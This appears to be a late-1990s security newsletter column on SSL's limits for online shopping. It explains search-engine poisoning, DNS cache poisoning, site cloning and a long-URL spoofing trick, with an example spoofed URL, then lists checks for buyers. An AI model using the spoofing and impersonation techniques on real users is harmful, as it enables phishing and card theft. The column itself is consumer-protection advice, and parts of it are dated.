Kurt Seifried, a columnist at SecurityPortal.com, recently caused a bit of a stir when he asked the question, "Is SSL [Secure Sockets Layer] Dead?" and provided scenarios by which subverted SSL could allow online transactions to be hijacked.
His article's major point is that SSL is still a useful session layer encryption protocol. However, SSL is oversold on its capabilities to secure transactions - that is, verifying that you are who you say you are and that you are really talking to the Web site you desire to buy from. SSL works, but it is a component of transactions, and it needs augmentation to ensure the integrity and security of the transactions.
We are not claiming that there are a lot of instances of bad guys going around SSL to swindle Internet buyers, but we see the opportunities within existing technology and configurations online vendors are using. If Internet commerce continues to grow as predicted, there will be an increased incentive to attempt to hijack transactions and credit card information.
Site redirection
Beware of search engine poisoning. We have seen Webmasters for shady sites successfully redirect traffic to their sites by copying the META tags from popular sites. Once the search engine spiders their site, they have associated the keywords from the popular site with the bad guys. If you aren't careful about looking at the results of your search engine query, you may select a site that is a dupe of the legitimate site.
DNS redirection. You need only go back to the summer of 1997, when Eugene Kashpureff performed the mother of all DNS hacks, and redirected all of the traffic destined to the Internic to his own Alternic.net service. DNS cache poisoning fills a DNS server with incorrect IP address to Host name associations. While under normal circumstances the IP address for Safe-Store.com should be 192.168.1.1, a poisoned DNS server may return 192.168.254.254, which is actually the address for Evil-Store.com.
Store impersonation. By however means the bad guy is able to redirect traffic to his site, he may succeed in capturing transactions by looking like the site you were expecting. This is all too easy - programs that completely download a Web site are fairly standard and very useful for a variety of legitimate reasons. Getting your home page to look exactly like a popular Web site is no problem at all.
Things to check
Verify the URL. Does the URL field indicate the site you thought you were going to? Be careful - hackers have learned a URL spoofing trick: constructing a URL long enough so that the rightmost portion shows up on your screen. Thus http://www.bad-guys.com/dir/ https://trading.etrade.com/cgi-bin/gx.cgi/applogic+TradeMain appears to be https://trading.etrade.com/cgi-bin/gx.cgi/applogic+TradeMain in your URL window.
Verify that the pages are encrypted. Newer versions of Netscape and Internet Explorer represent encrypted pages with a closed lock. Some online stores jump between secure and unsecured pages often enough that it is important to verify that any critical screens are encrypted.
Verify the server certificate. Did you know that by clicking on a secured page's lock, you could retrieve the server's certificate? You can verify that it belongs to the company you expect. The certificate will also expose the certificate hierarchy (i.e., who issued the certificate).
Look at the source code for a transaction URL. You may consider this to only be the realm of the paranoid, but where is your personal data being posted? If it is a form, is it using a POST or a GET action? Using GET may expose financial information in the URL, even if the form is encrypted. Therefore, a credit card number could show up in a Web server logfile. If the form action appears to be sending your data to an unusual host name or IP address, think twice before committing yourself to the transaction.
Using personal certificates. Technology is now available to obtain and use a digital certificate to authenticate yourself to a server and sign transactions. Unfortunately, this is not widely implemented at online stores, but it is critical to prevent fraud or reduce your own personal liability in the event your credit card number is pilfered.
There are certainly those who believe we are too extreme in our concerns about the integrity of the current system of Internet financial transactions. The analogy of giving your credit card to a waiter in a restaurant is a comment often made to us. The problem with this analogy is that the Internet is a completely different world, and this world requires a different set of standards in regards to protecting personal privacy.
If you have spent any time on newsgroups or in chat rooms, you know that people behave differently when hiding in anonymity online. This anonymity breaks down social conventions, and we believe provides greater opportunity and incentive for Internet fraud in the future. The technology and standards need to come together to provide more user-friendly protection to consumers. Until then, be careful out there.
RELATED LINKS
Currents: Major Internet Security Flaw
Archive of Network World on Security newsletters
Network World Security Alert will keep you up to date on the latest security holes and patches, with daily updates from key vendors, security organizations and Network World reporters. See the latest dispatches from the security here.
